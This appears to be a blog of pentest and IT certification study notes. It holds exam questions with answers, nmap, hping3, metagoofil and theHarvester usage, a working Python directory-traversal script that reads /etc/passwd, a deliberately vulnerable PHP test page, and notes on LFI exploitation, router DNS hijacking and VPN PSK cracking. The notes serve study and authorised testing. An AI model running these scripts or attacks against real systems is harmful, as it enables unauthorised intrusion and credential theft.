Saturday, June 22, 2019

Wireshark Three ways hand-shake

A member of the pen test team enters this filter into Wireshark:

((tcp.flags == 0x02) || (tcp.flags == 0x12) ) || 

((tcp.flags == 0x10) && (tcp.ack==1) && (tcp.len==0) )



What is he attempting to view?


A.SYN, SYN/ACK, ACK



B.SYN, FIN, URG, and PSH



C.ACK, ACK, SYN, URG



D.SYN/ACK only


A is correct. Wireshark has the ability to filter based on a decimal numbering system assigned to TCP flags (basically the flag’s binary value assigned to the bit representing it in the header). The assigned flag decimal numbers are FIN = 1, SYN = 2, RST = 4, PSH = 8, ACK = 16, and URG = 32. Adding flag numbers together (for example, SYN + ACK = 18) allows you to simplify a Wireshark filter. For instance, tcp.flags == 0x2 looks for SYN packets, tcp.flags == 0x16 looks for ACK packets, and tcp.flags == 0x18 looks for both (in the case presented in the question, the filter will display all SYN packets, all SYN/ACK packets, and all ACK packets).


B, C, and D are incorrect. These flags do not represent the values in the Wireshark filter.

Sunday, June 16, 2019

hping3

root@mybox: # hping3 -A 192.168.2.x -p 80

Hping is a great tool that provides a variety of options. You can craft packets with it, audit and test firewalls, and do all sorts of crazy man-in-the-middle stuff with it. In this example, you’re simply performing a basic ACK scan (the -A switch) using port 80 (-p 80) on an entire Class C subnet (the x in the address runs through all 254 possibilities). Hping3, the latest version, is scriptable (TCL language) and implements an engine that allows a human-
readable description of TCP/IP packets

Nmap questions and switches

You want to perform a ping sweep of a subnet within your target organization. Which of the following nmap command lines is your best option?

A.   nmap 192.168.1.0/24
B.   nmap -sT 192.168.1.0/24 - TCP connected scan
C.   nmap -sP 192.168.1.0/24 - Ping sweep
D.   nmap -P0 192.168.1.0/24 - Scan without ping (ICMP)


 C. The -sP switch within nmap is designed for a ping sweep. Nmap syntax is fairly straightforward: nmap<scan options><target>. If you don’t define a switch, nmap performs a basic enumeration scan of the targets. The switches, though, provide the real power with this tool.


  A is incorrect because this syntax will not perform a ping sweep. This syntax will run a basic scan against the entire subnet.

  B is incorrect because the -sT switch does not run a ping sweep. It stands for a TCP Connect scan, which is the slowest—but most productive and
loud—scan option.

  D is incorrect because this syntax will not perform a ping sweep. The -P0 switch actually runs the scan without ping (ICMP). This is a good switch to
use when you don’t seem to be getting responses from your targets. It forces nmap to start the scan even if it thinks that the target doesn’t exist (which
is useful if the computer is blocked by a firewall).

metagoofil

Your team is hired to test a business named Matt’s Bait’n’ Tackle Shop (domain name mattsBTshop.com). A team member runs the following command:
metagoofil -d mattsBTshop.com -t doc,docx -l 50 -n 20 -f results.html
Which of the following best describes what the team member is attempting to do?
A.   Extracting metadata info from web pages in mattsBTshop.com, outputting results in Microsoft Word format
B.   Extracting metadata info from the results.html page in mattsBTshop.com, outputting results in Microsoft Word format
C.   Extracting metadata info from Microsoft Word documents found in mattsBTshop.com, outputting results in an HTML file
D.   Uploading results.html as a macro attachment to any Microsoft Word documents found in mattsBTshop.com



C. This is an example of a good tool knowledge and use. Metgoofil, per www.edge-security.com/metagoofil.php, “is an information gathering tool
designed for extracting metadata of public documents (.pdf, .doc, .xls, .ppt, .docx, .pptx, .xlsx) belonging to a target company. It performs a search in
Google to identify and download the documents to local disk and then will extract the metadata with different libraries like Hachoir, PdfMiner, and others.
With the results, it will generate a report with usernames, software versions and servers or machine names that will help Penetration testers in the
information gathering phase.”
In the syntax given, metagoofil will search mattsBTshop.com for up to 50 results (the -l switch determines the number of results) of any Microsoft Word
documents (in both doc and .docx format) it can find. It will then attempt to download the first 20 found (the -n switch handles that), and the -f switch will
send the results where you want (in this case, to an HTML file).
And just what will those results be? Well, that’s where the fun comes in. Remember, metagoofil tries to extract metadata from publicly available Microsoft
Word documents available on the site. You might find e-mail addresses, document paths, software versions, and even usernames in the results.


Metagoofil
Metagoofil is a tool that utilizes the Google search engine to get metadata from the documents available in the target domain. Currently, it supports the following document types:

Word documents (.docx, .doc)
Spreadsheet documents (.xlsx, .xls, .ods)
Presentation files (.pptx, .ppt, .odp)
PDF files (.pdf)
Metagoofil works by performing the following actions:

Searching for all of the preceding file types in the target domain using the Google search engine
Downloading all of the documents found and saving them to the local disk
Extracting the metadata from the downloaded documents
Saving the result in an HTML file
The metadata that can be found includes the following:

Usernames
Software versions
Server or machine names
This information can be used later on to help in the penetration testing phase. Metagoofil is not part of the standard Kali Linux v 2.0 distribution. To install, all you need to do is use the apt-get command:

    # apt-get install metagoofil
After the installer package has finished, you can access Metagoofil from the command line:

    # metagoofil
This will display simple usage instructions and an example on your screen. As an example of Metagoogil usage, we will collect all the DOC and PDF documents (-t, .doc, .pdf) from a target domain (-d hackthissite.org) and save them to a directory named test (-o test). We limit the search for each file type to 20 files (-l 20) and only download five files (-n 5). The report generated will be saved to test.html (-f test.html). We give the following command:

    # metagoofil -d example.com -l 20 -t doc,pdf -n 5 -f test.html -o test 

Windows Server 2016 Administration Fundamentals

Questions

  1. Windows Server 2016 is Apple's latest operating system for servers. (True | False)
  2. The __________________ is a group of computers connected to each other in order to share resources.
  3. Which of the following are computer network components? (Choose two)
    1. computers
    2. servers
    3. Master Boot Record (MBR)
    4. Basic Input/Output System (BIOS)
  4. Resources can be data, network services, and peripheral devices. (True | False)
  1. Which of the following are Windows Server 2016 editions? (Choose three)
    1. Windows Server 2016 Essentials
    2. Windows Server 2016 Standard
    3. Windows Server 2016 Datacenter
    4. Windows Server 2016 Enterprise
  2. _________________________ is a web portal that provides the option to download and evaluate Microsoft's products free of cost.
  3. Which of the following are servers size and format factors? (Choose two)
    1. Blade servers
    2. Tower servers
    3. Network printer
    4. Network switch
  4. The Start menu is returned in Windows Server 2016. (True | False)
  5. _____________ is any device that can generate, receive, and transmit the networking resources on the computer network.
  6. Which of the following hardware components affect the performance of your servers? (Choose two)
    1. Processor
    2. RAM
    3. Printer
    4. Monitor
  7. A server is a computer that requests resources in a computer network. (True | False)
  8. ________________ networking is a computer network in which the participating computers do not have predefined roles in the network.
Chapter 1 — Answers
False
Computer network:
 
Computers
Servers
True:
 
Windows Server 2016 Essentials
Windows Server 2016 Standard
Windows Server 2016 Datacenter
TechNet Evaluation Center:
 
Blade servers
Tower servers
True
Node:
 
Processor
RAM
False
Peer to Peer (P2P)

Saudi Aramco explanation



WannaCry explanation


System Operations: An Overview of AWS

1.   Which of the following AWS management tools enables you to retain account activity pertaining to the actions they perform within the AWS infrastructure?

A.   AWS CloudWatch

B.   AWS CloudFront

C.   AWS CloudTrail

D.   AWS Config

2.   Which of the following are true when you use the Amazon Elastic File System (EFS)? (Choose two)

A.   Multiple EC2 instances can simultaneously access the same EFS file system.

B.   Multiple EC2 instances can’t access the same EFS file system at the same time.

C.   EC2 instances can connect only to EBS storage.

D.   EFS will automatically scale on demand.

3.   Which of the following AWS services enables you to view system-wide resource utilization, application performance, and the health of the various AWS system components?

A.   AWS OpsWorks

B.   Amazon CloudWatch

C.   AWS CloudTrail

D.   AWS CloudFront

4.   Which of the following tools helps you review configuration changes and analyze the resource configuration histories?

A.   AWS Config

B.   AWS CloudTrail

C.   AWS Systems Manager

D.   AWS CloudWatch

5.   Which one of the following AWS services acts as a virtual firewall to control Internet traffic for EC2 instances?

A.   Amazon Virtual Private Cloud

B.   Availability zones

C.   Security groups

D.   Network access control lists

6.   You currently run several web servers by hosting them on the Amazon EC2 instances. You learn that you can move the static web sites to which of the following services, instead of using EC2 instances to run them?

A.   Amazon Route 53

B.   Amazon Simple Storage Service (Amazon S3)

C.   Amazon RDS

D.   Amazon CodeDeploy

7.   Which of the following location-related concepts provides high availability and fault tolerance for the applications that you run in the AWS cloud?

A.   Availability zones

B.   Content delivery networks

C.   AWS regions

D.   Edge locations

8.   Which of the following are true regarding regions and availability zones? (Choose two)

A.   All regions are connected via high-speed links.

B.   Availability zones in all the regions are tightly connected with one another.

C.   All regions are separated from one another.

D.   All availability zones within each region are connected via high-speed links.

9.   Which of the following storage types offers “query-in-place” functionality, enabling you to run analytics directly on the data you store (data-at-rest) through Amazon Athena?

A.   Amazon Elastic File Service (Amazon EFS)

B.   Amazon Simple Storage Service (Amazon S3)

C.   Amazon Elastic Container Service (Amazon ECS)

D.   Amazon Glacier

10.   Which of the following AWS services helps you connect your on-premise data center to the AWS cloud with a dedicated network connection from your on-premise network directly to your Amazon VPC?

A.   Amazon Virtual Private Cloud (Amazon VPC)

B.   AWS Direct Connect

C.   Amazon Route 53

D.   Availability zone

11.   What is the deployment unit in AWS Lambda?

A.   A virtual server

B.   A container

C.   A microservice

D.   Code

12.   Which of the following storage types offers a file system interface to storage?

A.   Amazon EFS

B.   Glacier

C.   Amazon EBS

D.   Instance storage

13.   Which of the following AWS services helps you treat the AWS infrastructure as code?

A.   Amazon CloudWatch

B.   AWS OpsWorks

C.   Amazon CloudControl

D.   Amazon CloudTrail

14.   Which of the following AWS cloud services helps with your IT governance, compliance, and auditing requirements?

A.   Amazon CloudWatch

B.   AWS OpsWorks

C.   Amazon CloudControl

D.   Amazon CloudTrail

15.   You periodically run several heavy data processing jobs in the AWS cloud. After you complete the data processing, you’d like to retain the data on the Amazon EC2 file system, although you’re going to shut down the Amazon EC2 instance to keep from incurring charges between your jobs. Which of the following AWS cloud services helps you store data in a persistent basis in these types of situations?

A.   Amazon Glacier

B.   Amazon Simple Storage Service (Amazon S3)

C.   Amazon Elastic Block Store (Amazon EBS)

D.   Amazon RDS

16.   Which of the following architecture extends your on-premise infrastructure into a cloud such as the AWS cloud so you can connect the cloud resources to your data center?

A.   AWS Direct Connect

B.   Amazon S3

C.   A public cloud architecture

D.   A hybrid cloud architecture

17.   You notice huge spurts in your online customer traffic to your e-commerce web site around your heavily promoted quarterly sales events. Which of the following features or services can you use to handle the spurts in customer traffic during the sales events?

A.   Auto Scaling

B.   Amazon Simple Storage Service (Amazon S3)

C.   AWS Lambda

D.   AWS Snowball

18.   Which of the following architectural layers are part of a three-tier architecture? (Choose three)

A.   Storage layer

B.   Front-end web server layer

C.   Database layer

D.   Application layer

19.   Which of the following AWS cloud services is a fully managed NoSQL database service?

A.   Amazon Relational Database Service (Amazon RDS)

B.   Amazon Aurora

C.   Amazon ElastiCache

D.   Amazon DynamoDB

20.   Which of the following AWS cloud services enables you to work in a logically isolated section of the cloud where you can launch your AWS resources into a virtual network you define?

A.   Amazon Route 53

B.   Amazon Virtual Private Cloud (Amazon VPC)

C.   Amazon Security Groups

D.   Amazon API Gateway

21.   Which of the following AWS cloud services would you use to decouple your user-facing applications from your backend services such as a database?

A.   Amazon CloudTrail

B.   Amazon Simple Queue Service (Amazon SQS)

C.   Amazon Simple Notification Service (Amazon SNS)

D.   AWS Lambda

22.   Under the shared responsibility security model, which of the following would be the responsibility of the cloud provider? (Choose two)

A.   Power supplies to the compute instances

B.   Data center physical security

C.   Configuration of the AWS provided security group firewall

D.   Database credentials and roles

23.   Which of the following AWS services helps you automate your code deployment?

A.   AWS CodeDeploy

B.   AWS CodePipeline

C.   AWS Systems Manager

D.   AWS CodeCommit

24.   You’re interested in finding out the origination point for an API call, as well as the times when the call was made. Which of the following tools will help you get the information you’re looking for?

A.   AWS CloudWatch

B.   AWS Systems Manager

C.   AWS CodeDeploy

D.   AWS CloudTrail

25.   Which of the following information does the AWS CloudTrail service track? (Choose two)

A.   User activity

B.   Resource usage

C.   Application usage

D.   API calls

26.   Which of the following is not a means of accessing the AWS cloud platform?

A.   AWS SDK

B.   AWS CLI

C.   AWS Management Console

D.   Chef and Puppet



Answers

1.   C. CloudTrail tracks all user activity and records the API usage.

2.   A, D. A is correct because more than one EC2 instance can access the same EFS file system. D is correct because EFS automatically scales on demand without your having to provision anything.

3.   B. CloudWatch is a monitoring series that shows resource utilization, application performance, and the AWS system health.

4.   A. AWS Config records configuration changes to all AWS resources.

5.   C. Security groups are like firewalls that control traffic into and out of the EC2 instances.

6.   B. You can store your static web content in S3 and serve that content directly from S3 instead of launching web servers by hosting them on EC2 instances.

7.   A. There are multiple availability zones within each AWS region, thus providing a higher availability and resilience for your applications.

8.   C, D. Regions are geographically separated from one another and all availability zones with in a region are connected via low-latency network connections.

9.   B. You can directly query data that you store in S3.

10.   B. AWS Direct Connect enables you to connect your on-premise data centers and offices to the AWS cloud, to enable fast transmission of data.

11.   D. The deployment unit in AWS Lambda is code because it employs a serverless architecture.

12.   A. Amazon EFS offers a file system interface to storage in AWS.

13.   B. AWS OpsWorks is a configuration management service like Chef and Puppet and enables you to treat your infrastructure as code.

14.   D. CloudTrail tracks user activity and API usage, and this information is useful for auditors who want to examine your governance, compliance, and auditing requirements.

15.   C. EBS offers persistent storage that will remain intact after you shut down the EC2 instances.

16.   D. A hybrid cloud architecture is where you use your on-premise and public cloud infrastructures as a single infrastructure.

17.   A. Auto Scaling is an AWS feature that helps you handle spurts in demand for your applications by automatically scaling your EC2 instances up or down.

18.   B, C, D. The three-tier architecture consists of the web server, database, and application layers.

19.   D. Amazon DynamoDB is a fully managed NoSQL database.

20.   B. Amazon VPC is a logically separated section of the VPC where you can launch your AWS resources into your own private virtual network.

21.   B. Amazon Simple Queue Service (SQS) is a fully managed message queuing service that helps you decouple and scale microservices, distributed systems, and serverless applications. SQS helps decouple and coordinate components of a cloud application. You can send, store, and receive messages between software components at high volume using SQS as the messaging service.

22.   A, B. In the shared responsibility security model, the cloud provider (AWS) is responsible for securing the cloud infrastructure. This includes securing the power supplies and physical security of the data center.

23.   A. CodeDeploy is a service that automates software deployments to compute services such as EC2, AWS Lambda, and instances running in your on-premise data centers.

24.   D. CloudTrail tracks and records all user activity and API usage in the AWS cloud.

25.   A, D. CloudTrail tracks and records user activity and API usage in the AWS cloud.

26.   D. Chef and Puppet are configuration management tools.

Kill Chain Hacking


Approaches for hacking





Armitage - hail mary


There is much more to Armitage than can be explained by the short introduction provided by this text. For more details, take a look at the Armitage manual, available at http://www.fastandeasyhacking.com/manual.

root@kali:~# apt-get install armitage

Exam Ref: MS-101 Microsoft 365 Mobility and Security

Thought experiment

In this thought experiment, demonstrate your skills and knowledge of the topics covered in this chapter. You can find the answer to this thought experiment in the next section.
Alpine Ski House is a global organization, spanning 200 locations and supporting 25,000 mobile devices. Some offices have slow WAN links, but all locations have fast Internet connections. The organization is using ConfigMgr for device management and deployment. All employees are registered in Azure AD and have an Office 365 license assigned. Last year they started introducing Windows 10 through a traditional bare metal deployment. 2,500 devices are running Windows 10, version 1803 and the remaining fleet is running Windows 8.1. Your manager has tasked you with creating a deployment plan for fully adopting Windows 10 over the next 6 months and keeping current with new releases. As the technical lead for enterprise device management, you have started testing the in-place upgrade using ConfigMgr, going from Windows 8.1 to Windows 10. Some devices upgraded successfully, and others failed. As part of your deployment design you need to address the following questions, while minimizing on-premises infrastructure:
  1. The in-place upgrade from Windows 8.1 to Windows 10 has identified some compatibility issues. What solution should you implement to track compatibility for your fleet and what steps do you need to take to implement this solution?
  2. Windows 10 Enterprise 64-bit is the target operating system for your fleet. Through a recent discovery you found 5% of your Windows 8.1 devices are 32-bit. What solution will you use to upgrade these devices?
  3. What servicing channels should you adopt to keep current with the latest releases of Windows 10 and what steps do you need to take to implement them?
  4. The 2,500 devices running Windows 10 need to be upgraded to version 1809. What solution should you implement to upgrade these devices?
  5. Your CIO is asking you to begin migrating MDM workloads to Intune. What MDM solution addresses this requirement.

Thought experiment answers

This section contains the solution to the thought experiment. Each answer explains why the answer choice is correct.
  1. To address compatibility issues with Windows 10 you should implement upgrade readiness. To accomplish this, you will need to create the Log Analytics workspace in Azure. After creating the workspace, you should create and deploy a GPO with Windows telemetry enabled and set to basic, along with your commercial ID. The Windows 8.1 computers will also need KB2976978 installed before they can upload data.
  2. The Windows 8.1 computers will need to be upgraded using a refresh or replace deployment method. The user state can be captured with ConfigMgr and restored after the device has been re-imaged using a Windows 10 64-bit installation.
  3. To support the latest release of Windows 10, you should adopt Semi-Annual Channel (Targeted) and plan for the Windows Insider channel to prepare for new versions of the operating system. You should use a GPO to configure the servicing channel.
  4. You should use Windows Update for Business to manage the upgrade from Windows 10, version 1803 to Windows 10, version 1809.
  5. The best solution is to use Microsoft Intune with co-management enabled in ConfigMgr. This solution will deliver a cloud-based MDM with support for iOS, Android, and Windows 10. This will also enable the organization to transition workloads for Windows 10 from ConfigMgr to Microsoft Intune. The existing devices enrolled in MDM for Office 365 can also be assigned EMS licenses and can be converted to Intune.

Trity - advanced pentesting framework

Trity

Trity is an advanced pentesting framework dedicated to everything from vulnerability testing to cryptography.

Installation & Usage

In order to install this program, it is crucial that you are on a Linux-based distro, preferably Kali-Linux or BackBox.
First, git clone.
git clone https://github.com/toxic-ig/Trity.git






Spike Pentester Fuzz

https://github.com/Ara2104/vulnserver







searchsploit with two variables


macchanger - mac address


syn flood using python


squeal sqcol tables python







slumber.py - python - exploit - automate



webinject.py




FTP banner grabbing - python - urllib url open banner grabbing





Banner test and potscan test using pyuthon




Python - Crypt - password


Create your own dict.txt

Bash scripting




Monday, June 10, 2019

Nmap -p80 --script http-enum

Nmap -p80 --script http-enum


dizem ao Nmap para iniciar o script http-enum se um servidor web  encontrado na porta 80.


  PORT STATE SERVICE
   80/tcp open  http
   | http-enum:
   |_  /crossdomain.xml: Adobe Flash crossdomain policy

   PORT   STATE SERVICE
   80/tcp open  http
   | http-enum:
   |   /administrator/: Possible admin folder
   |   /administrator/index.php: Possible admin folder
   |   /home.html: Possible admin folder
   |   /test/: Test page
   |   /logs/: Logs
   |_  /robots.txt: Robots file


$ nmap --script http-enum --script-args http-enum.fingerprintfile =. / myfingerprints.txt -p80 <target>

Por padrão, o http-enum usa o diretório raiz como o caminho base. Para definir um caminho base diferente, use o argumento de script http-enum.basepath:

$ nmap --script http-enum - script-args http-enum.basepath = / web / -p80 <target>


Para exibir todas as entradas que retornaram um código de status que poderia indicar uma página, use o argumento de script http-enum.displayall:

$ nmap --script http-enum --script-args http-enum.displayall -p80 <target>


$ nmap --script http-enum --script-args http-enum.nikto-db-path=<Path to Nikto DB file> -p80 <target>  

Monitor mode on airmon-ng

Antes de prosseguir, vamos colocar a nossa placa de Wifi no modo monitor. Muito parecido com o modo promíscuo no Wireshark, o modo monitor permite-nos ver tráfego adicional em cima do tráfego destinado a nossa placa sem fio. Usaremos o script Airmon-ng, parte do conjunto de avaliação do Aircrack-ng, para colocar o cartão Alfa no modo monitor. Primeiro, certifique-se de que nenhum processo em execução interfira no monitor

root@kali:~# airmon-ng check
root@kali:~# airmon-ng check kill
root@kali:~# airmon-ng start wlan0

             (monitor mode enabled on mon0) ❶

The Harvester: descobrindo e otimizando endereços de e-mail


Uma excelente ferramenta para usar em reconhecimento é o Harvester. O Harvester é um script Python simples, mas altamente eficiente, escrito por Christian Martorella, da Edge Security. Essa ferramenta nos permite catalogar com rapidez e precisão tanto os endereços de email quanto os subdomínios diretamente relacionados ao nosso destino.

É importante sempre usar a versão mais recente do Harvester, pois muitos mecanismos de pesquisa atualizam e alteram regularmente seus sistemas. Mesmo mudanças sutis no comportamento de um mecanismo de pesquisa podem tornar as ferramentas automatizadas ineficazes. Em alguns casos, os mecanismos de pesquisa filtrarão os resultados antes de retornar as informações para você. Muitos mecanismos de pesquisa também empregam técnicas de otimização que tentam evitar que você execute pesquisas automatizadas.

O Harvester é construído em Kali. A maneira mais rápida de acessar o Harvester é abrir uma janela de terminal e emitir o comando: theharvester. Se você precisar do caminho completo para o programa e estiver usando o Kali, o Harvester (e quase todas as outras ferramentas) pode ser encontrado no diretório / usr / bin /. No entanto, lembre-se de que uma grande vantagem para Kali é que você não precisa mais especificar o caminho completo para executar essas ferramentas. Basta abrir o terminal e entrar no comando start da ferramenta. Por exemplo, para executar o coletor, abra um terminal e execute o seguinte comando:

  theharvester

Você também pode emitir o caminho completo para executar o programa:

  / usr / bin / theharvester

Se você estiver usando uma versão diferente do Backtrack ou do Kali ou não conseguir localizar o Harvester (ou qualquer ferramenta discutida neste livro) no caminho especificado, poderá usar o comando locate para ajudar a localizar onde a ferramenta está instalada. Para usar o comando locate, você precisa primeiro executar o comando updatedb. Para descobrir onde o Harvester está instalado em seu sistema, abra um terminal e digite o comando:

  updatedb

Seguido pelo comando:

  locate theharvester

A saída do comando locate pode ser muito detalhada, mas uma revisão cuidadosa da lista deve ajudá-lo a determinar onde a ferramenta ausente está instalada. Como mencionado anteriormente, quase todas as ferramentas de testes de penetração no Kali estão localizadas em um subdiretório da pasta

/usr/bin/

ALERTA!

Se você estiver usando um sistema operacional diferente do Kali, poderá fazer o download da ferramenta diretamente do Edge Security em http://www.edge-security.com. Depois de baixá-lo, você pode descompactar o arquivo tar baixado, executando o seguinte comando em um terminal:

   tar xf theHarvester

Por favor, note o capital “H” que é usado ao descompactar o código. O Linux faz distinção entre maiúsculas e minúsculas, de modo que o sistema operacional vê a diferença entre "theHarvester" e "theharvester". V

Certifique-se de estar na pasta do Harvester e execute o seguinte comando:

  ./theharvester.py –testedocurso.com –l 10 –b google

Este comando irá procurar e-mails, subdomínios e hosts que pertencem ao testedocurso.com.



Um minúsculo “–d” é usado para especificar o domínio de destino.

Uma minúscula “–l” (que é um L não um 1) é usada para limitar o número de resultados retornados para nós. Nesse caso, a ferramenta foi instruída a retornar apenas 10 resultados.

O “–b” é usado para especificar o repositório público que queremos pesquisar.Podemos escolher entre uma ampla variedade, incluindo Google, Bing, PGP, LinkedIn e muito mais.

Traversal de diretório baseado em URL automatizado



Occasionally, websites call files using unrestricted functions; this can allow the fabled Directory Traversal or Direct Object Reference (DOR). In this attack, a user can call arbitrary files within the context of the website by using a vulnerable parameter. There are two ways this can be manipulated: firstly, by providing an absolute link such as /etc/passwd, which states from the root directory browse to the etc directory and open the passwd file, and secondly, relative links that travel up directories in order to reach the root directory and travel to the intended file.

A script that attempts to open a file that is always present on a Linux machine, the aforementioned /etc/passwd file by gradually increasing the number of up directories to a parameter in a URL. It will identify when it has succeeded by the detection of the phrase root that indicates that file has been opened.

Getting ready
Identify the URL parameter that you wish to test. This script has been configured to work with most devices: etc/passwd should work with OSX and Linux installations and boot.ini should work with Windows installations. See the end of this example for a PHP web page that can be used against to test the validity of the scripts.

We will be using the requests library that can be installed through pip. In the author's opinion, it's better than urllib in terms of functionality and usability.

How to do it…
Once you've identified your parameter to attack, pass it to the script as a command line argument. Your script should be the same as the following script:

import requests
import sys
url = sys.argv[1]
payloads = {'etc/passwd': 'root', 'boot.ini': '[boot loader]'}
up = "../"
i = 0
for payload, string in payloads.iteritems():
  for i in xrange(7):
    req = requests.post(url+(i*up)+payload)
    if string in req.text:
      print "Parameter vulnerable\r\n"
      print "Attack string: "+(i*up)+payload+"\r\n"
      print req.text
      break
The following is an example of the output produced when using this script:

Parameter vulnerable

Attack string: ../../../../../etc/passwd

Get me /etc/passwd! File Contents:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
How it works…
We import the libraries we require for this script, as with every other script we've done in the module so far:

url = sys.argv[1]
We then take our input in the form of a URL. As we are using the requests library, we should ensure that our URL matches the form requests is expecting, which is http(s)://url. Requests will remind you of this if you get it wrong:

payloads = {'etc/passwd': 'root', 'boot.ini': '[boot loader]'}
We establish the payloads which we are going to send in each attack in a dictionary. The first value in each pair is the file that we wish to attempt to load and the second is a value that will definitely be within that file. The more specific that second value is, the fewer false positives that will occur; however, this may increase the chances of false negatives. Feel free to include your own files here:

up = "../"
i = 0
We provide the up directory shortcut ../ and assign it to the up variable and we set the counter for our loop to 0:

for payload, string in payloads.iteritems():
  while i < 7:
The Iteritems method allows us to go through the dictionary and take each key and value, and assign them to variables. We assign the first value as payload and the second value as string. We then cap our loop to stop it repeating forever in the event of a failure. I have set this to 7 though this can be set to any value that you please. Bear in mind the likelihood of a directory structure for a web app being any higher than 7:

req = requests.post(url+(i*up)+payload)
We craft our request by taking our root URL and appending the current number of up directories according to the loop and the payload. This is then sent in a post request:

if string in req.text:
      print "Parameter vulnerable\r\n"
      print "Attack string: "+(i*up)+payload+"\r\n"
      print req.text
      break
We check to see whether we have achieved our goal by looking for our intended string in the response. If the string is present, we halt the loop and print out the attack string, along with the response to the successful attack. This allows us to manually verify whether the attack was successful or whether the code needs to be refactored, or the web app isn't vulnerable:

    i = i+1
  i = 0
Finally, the counter is added to each loop until it reaches the preset max. Once the max is reached, it is set to zero for the next attack string.

There's more
This recipe can be adapted to work with parameters through the application of the principles shown elsewhere in the module. However, due to the rarity of pages being called through parameters and intentional brevity, this has not been provided.

This can be extended, as earlier mentioned, by adding additional files and their commonly occurring strings. It could also be extended to grabbing all interesting files once the ability to directory traverse and the depth required to reach root has been established.

The following is a PHP web page that will allow you to test this script on your own build. Just put it in your var/www directory or whichever solution you use. Do not leave this active on an unknown network:

<?php
echo "Get me /etc/passwd! File Contents";
if (!isset($_REQUEST['id'])){
header( 'Location: /traversal/first.php?id=1' ) ;
}
if (isset($_REQUEST['id'])){
  if ($_REQUEST['id'] == "1"){
    $file = file_get_contents("data.html", true);
    echo $file;}

else{
  $file = file_get_contents($_REQUEST['id']);
  echo $file;
}
}?>

Sunday, June 9, 2019

Server 2016 HA


Local file inclusion exploitation tool





LFI Exploitation tool





liffy WikiUsageInstallation


A little python tool to perform Local file inclusion.


Liffy v2.0 is the improved version of liffy which was originally created by rotlogix/liffy. The latter is no longer available and the former hasn't seen any development for a long time.
Main feature
data:// for code execution
expect:// for code execution
input:// for code execution
filter:// for arbitrary file reads
/proc/self/environ for code execution in CGI mode
Apache access.log poisoning
Linux auth.log SSH poisoning
Direct payload delivery with no stager
Support for absolute and relative path traversal
Support for cookies for authentication
Documentation
Installation
Usage
Contribution


Suggest a feature
Like any other technique to exploit LFI


Report a bug


Fix something and open a pull request


In any case feel free to open an issue
Credits


All the exploitation techniques are taken from liffy


Logo for this project is taken from renderforest
Say Thanks


If you'd like to 🎉 say thanks 😄

Caçando router com Routerhunter

O Routerhunter é uma ferramenta usada para localizar roteadores vulneráveis em uma rede e executar vários ataques para explorar a vulnerabilidade do DNSChanger. Essa vulnerabilidade permite que um invasor altere o servidor DNS do roteador, direcionando todo o tráfego para os sites desejados.


git clone https://github.com/Exploit-install/Routerhunter-2.0.git



Depois que o arquivo for clonado, insira o diretório.
Execute o seguinte comando:
python routerhunter.py -h


Podemos fornecer ao Routerhunter um intervalo de IP, IPs de servidor DNS e assim por diante.

Using proxychains com Tor

Usando proxychains com Tor
Para usar proxychains com o Tor, primeiro precisamos instalar o Tor usando o seguinte comando:
apt-get install tor
Uma vez instalado, nós executamos o Tor digitando tor no Terminal.
Em seguida, abrimos outro Terminal e digite o seguinte comando para usar um aplicativo por meio de proxychains:


proxychains toolname –arguments

proxychains nmap –arguments


Pentesting VPN's ike-scan

Para este método, usaremos as ferramentas ike-scan e ikeprobe. Primeiro, instalamos o ike-scan clonando o repositório Git:

clone git https://github.com/royhills/ike-scan.git


Como fazer isso...
Navegue até o diretório onde o ike-scan está instalado.
Instale o autoconf executando o seguinte comando:
apt-get install autoconf
Execute o autoreconf --install para gerar um arquivo .configure.
Execute ./configure.
Execute make para construir o projeto.
Execute make check para verificar o estágio de construção.
Execute make install para instalar o ike-scan.
Para varrer um host para um handshake no modo Agressivo, use o seguinte comando:
   ike-scan x.x.x.x –M -A

Às vezes, veremos a resposta depois de fornecer um nome de grupo válido, como vpn:

ike-scan x.x.x.x –M –A id = vpn

Para ver a lista de todas as opções disponíveis, podemos executar o seguinte comando:
ike-scan -h


Podemos até mesmo forçar os nomes dos grupos usando o seguinte link: https://github.com/SpiderLabs/groupenum.
Aqui está o comando:
./dt_group_enum.sh x.x.x.x groupnames.dic



Cracking the PSK

  1. Adding a –P flag in the ike-scan command will show a response with the captured hash.
  2. To save the hash, we provide a filename along with the –P flag.
  3. Next, we can use psk-crack with the following command:
psk-crack –b 5 /path/to/pskkey
-b is brute force mode and length is 5.
  1. To use a dictionary-based attack, we use the following command with -d flag to input the dictionary file:
psk-crack –d /path/to/dictionary /path/to/pskkey


In Aggressive mode, the authentication hash is transmitted as a response to the packet of the VPN client that tries to establish a connection tunnel (IPSec). This hash is not encrypted and hence it allows us to capture the hash and perform a brute force attack against it to recover our PSK.

This is not possible in Main mode, as it uses an encrypted hash along with a 6-way handshake, whereas Aggressive mode uses only a 3-way handshake.

Prevent outsiders from using these Google dorks against your web systems

 Modifying the robots.txt file in your server, as follows: • Prevent indexing from Google by running the following code:  User-agent: Google...